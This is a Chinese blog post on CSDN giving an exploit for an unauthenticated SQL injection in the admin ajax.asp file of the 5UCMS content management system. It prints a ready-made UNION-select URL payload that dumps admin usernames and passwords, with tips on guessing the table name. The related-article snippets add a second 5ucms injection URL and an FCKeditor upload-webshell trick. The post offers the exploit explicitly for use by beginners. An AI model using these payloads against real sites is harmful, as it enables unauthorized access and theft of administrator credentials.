5UCMS漏洞利用

最新推荐文章于 2023-03-27 10:06:31 发布
最新推荐文章于 2023-03-27 10:06:31 发布
阅读量1.1k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: object 公告 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6587015
版权
有一次不小心发现了5UCMS一个小漏洞。漏洞文件

后台目录/ajax.asp 因未进行后台用户验证,导致未登陆也可访问此文件,文件存在sql注入。 我今天进官方看了下好象漏洞他们已经发出了修复公告了,这里我把利用公布出来 直接暴出后台帐号密码。

ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20fromxxxx_Admin &id=1%20and%201=2%20UNION%20select%201%20from xxxx_Admin xxxx_Admin这个表名一般都是他们在安装的时候自定以的,一般都是用域名 比如www.xxxa.com这个站 表名可能就是xxxa_admin 大家自己修改。没什么技术含量 一般新手暴不出来所以才发出来

说实话他们的程序还是比较安全的能搞出个也不错了。对于我们这些菜鸟来说。

出现:True|False|ERR: Object required 证明表名添写错误了。

成功如下图


7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bagecms V3.1.3 后台任意文件读取漏洞1
08-03
漏洞简介:BageCMS是一套基于PHP和MySQL的跨平台的内容管理系统(CMS)。管理功能过滤不严导致任意文件读取漏洞。##漏洞分析在文件 www\prot
5ucms 最新版 sql 注入漏洞
fengling132的专栏
07-02 687
漏洞EXP↓  /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin 放手上很久了,没怎么用。就放出来吧。希望只用于测试。不要恶意利用。
UCMS文件上传漏洞(CVE-2020-25483)
鸣蜩十四的博客
11-11 3716
简介 UCMS是一套使用PHP语言编写的内容管理系统。 漏洞概述 UCMS v1.4.8版本存在安全漏洞,该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问服务器。 影响版本 UCMS v1.4.8 测试环境 使用的是vulfocus平台自带镜像,直接开启,进入靶场环境,目录为/ucms 漏洞分析 在1.4.8版本中,下载源码进行分析 可以看到在fileedit.php中对上传的文件没有做任何过滤,导致任意文件上传漏洞 在index.php文件中可以看到参数d
5ucms帮助文档大全
资料汇总整理-仅供个人学习使用
09-19 7054
无忧的特点我给大家介绍一下: 根据本人实际实用无忧建立的若干个网站得出以下结论:(个人看法,不代表官方意见。) ★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆ 1、SEO强大:强大的文件名自定义功能几乎可以定义出任何想定义的文件名结构。如 www.***.com/ab/www.***.com/ab.html 以及步凡最看好的标题转拼音功能 www.***.com/a/biaoti.
5UCMS留言板插件开发指南
资料汇总整理-仅供个人学习使用
12-22 1486
读完这一片文章,你就能自己开发自己想要的5UCMS留言板插件! 首先,本文的插件以网络流行的插件为蓝本。 留言本,在企业站点当中充当着询盘管理的角色,即使是在个人博客中,留言本也是站长和访客交流的友好工具,那么打造一款适合自己站点的留言板就显得尤为重要,本文交你如何改造属于自己的留言本。 首选,对于5UCMS插件来说,首先要操作的就是在后台安装插件表,控制这个插件表的数据则位于插
5ucms 下载
11-15
作为一款成熟的CMS系统,5UCMS会定期更新以修复已知的安全漏洞,保障用户的数据安全。同时,用户也需要注意定期升级系统和插件,以保持最佳的运行状态。 总之,5UCMS插件版是一个功能完善的网站内容管理系统,它...
5ucms php 下载
09-07
5ucms是一款采用PHP开发,THINKPHP为内核,基于HMVC规则开发适合中小企业、公司、新闻、个人等相关行业的网站内容管理。程序具有良好的用户体验用建议的操作,适合美工人员快速建立站点,您也可以根据您的需要进行...
5ucms标签使用说明
12-14
5ucms的标签详细介绍 -- 底层标签 —— 1. 文章内容标签调用:[Field:字段名称] 2. 分页标签调用:[page:字段名称] 3. 其它标签调用:[标签名称:字段名称] 底层标签扩展属性:{field:字段名 属性名称=属性值}, 1....
5UCMS 紫色漂亮模板源代码
03-18
5UCMS 紫色漂亮模板源代码】是一个针对5UCMS内容管理系统设计的美观模板,主要特点是采用紫色调,旨在提供一个专业且引人注目的网站展示样式。5UCMS是一个基于PHP开发的内容管理框架,适用于构建企业网站和其他...
火车头5UCMS1.2免登陆发布接口
09-28
【火车头5UCMS1.2免登陆发布接口】是一个高效、便捷的工具,它允许用户无需登录5UCMS后台即可实现文章的自动化发布。这个接口的特色在于它能够模拟人工发布过程,确保发布的内容与手动操作时的效果一致,包括是否...
第一版5UCMS个人博客 V3
04-09
第一版5UCMS个人博客,5UCMS模板
5U网络文章管理系统(5UCMS) 3.2012.0625 UTF-8.rar
07-05
5u网站管理系统,是一款国内最专业、使用人数最多、应用范围最广的小型 ASP网站建站系统,适用于中小型企业自主建站,它使用方便快捷 、操作简单 明了、安装部署灵活,并提供海量插件,及各各行业的模板免费下载,seo友 好性强,简约而不简单,可应用于图片站、企业站、文章资迅站、 下载站等等,是企业建站的最好选择。 5uCMS v3.2012.0625更新说明: 更新手机客户端页面参数没有判断导致sql注入漏洞 5uCMS v3.2012.0503更新说明: 新增栏目大类分页标签属性 升级说明:替换inc/class_template.asp 标签说明:新增$cid属性 使用说明: <!--page:{$size=5 $cid=1,2,3}--><!--page-->调用指定栏目ID编号为1、2、3的文章列表 <!--page:{$size=5 $cid={field:childid}}--><!--page-->调用上级栏目下面所有子栏目的文章列表 <!--page:{$size=5}--><!--page-->不加cid属性默认调用终极栏目列表 修复后台登录提示非法请求 升级说明:替换admin/ajax/login.asp 修正自定义模型在编辑以前的文章时不能保存自定义字段数据 升级说明:替换admin/admin_content.asp,admin/inc/class_content.asp,admin/ajax.asp 修正取消文章内容分页在关闭分页功能后以前的文章需要在内容里面取消分页符 升级说明:替换inc/class_content.asp,admin/inc/class_content.asp 增加发布内容每20秒自动保存一次,在发布失败的失败的时候可以恢复内容 升级说明:替换admin/ajax.asp,admin/js/common.js,admin/admin_content.asp和admin/images/ajax.js 修复批量上传时在编辑框里面显示的是图片地址 升级说明:替换admin/update.asp 修复插件不能安装和卸载 升级说明:替换admin/images/ajax.js,admin/admin_plus.asp
SQL批量替换工具.rar
08-18
SQL批量替换工具
【CVE-2020-25483】UCMS文件上传漏洞
最新发布
qq_46487664的博客
03-27 433
UCMS v1.4.8版本存在安全漏洞,该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问服务器。6.3使用账号密码admin:123456登录。添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 7379
渗透测试实验,外网渗透和内网穿透的详细操作过程以及内网代理和内网探测的方法
kingcms5.0/5.1漏洞
【设计改变世界】github地址:https://github.com/guochunyang2004
04-15 2666
<br />这个漏洞不晓得应不应该出现在这。希望大家尽快修复吧,免得被挂马了再亡羊补牢。<br /><br />1。kingcms 5.0 fckeditor的默认路径在 admin/system/editor/FCKeditor/editor/fckeditor.Html <br />把本地的马命名为 hx.asp;jpg 注意看 jpg前面没有点了..<br />OK了..其实以后做站结合fckeditor这类的编辑器..最好加个验证..只有管理才能访问..这样或者比较好吧<br /><br />2。编
5ucms的FCKeditor编辑器上传图片文件问题
资料汇总整理-仅供个人学习使用
06-11 1607
现在很多CMS系统因为安全原因会把后台编辑器里的上传功能给去除,但这样一来对实际使用过程造成了很多麻烦,今天我们以ASPCMS系统的FCKeditor编辑器为例,说明一下如何增加图片上传功能。 1. 打开网站后台编辑器里的admin/editor/fckconfig.js这个文件 找到FCKConfig.ImageUpload = false 这句,把false改成true就行啦。
最小修改实现5UCMS IF语句的嵌套
12-14 1007
将 inc\class_template.asp 458行的 Parser_IF 函数整体注释掉,改成下面两个函数   Public Function Parser_IF() Dim PreLB PreLB = "" Parser_IF2(PreLB) End Function ' 判断标签 Public Function Parser_IF2(ByVal
5ucms信息源RSS插件代码
资料汇总整理-仅供个人学习使用
10-09 554
新建自定义页面,不使用模板,命名为rss.xml。复制一下代码,加到内容部分就可以了 rss地址就是http://网站地址/rss.xml {sys:webname} - RSS邮件订阅 {sys:httpurl} 标题 网站名称 {sys:httpurl} 邮箱 zh-cn 10 [Rss:aurl] [Rss:titlex] [Rss:aut
密码找回漏洞总结
zaqwescsdn的博客
06-19 2916
概述大部分是乌云知识库中的内容,已经总结的很好了,再按照自己的思路过一遍。 1.伪造请求(未注册的情况下)在请求密码修改的过程中,修改账号的手机或邮箱等联系方式,在接受到验证码后进行密码修改。 OPPO修改任意帐号密码-2 OPPO修改任意帐号密码-3 修改了接受密码手机,并且通过对账户类型的修改绕过边界。2.使用正常账户请求修改获取token 爆破(绕过次数验证) 当当网任意用户密码修改漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值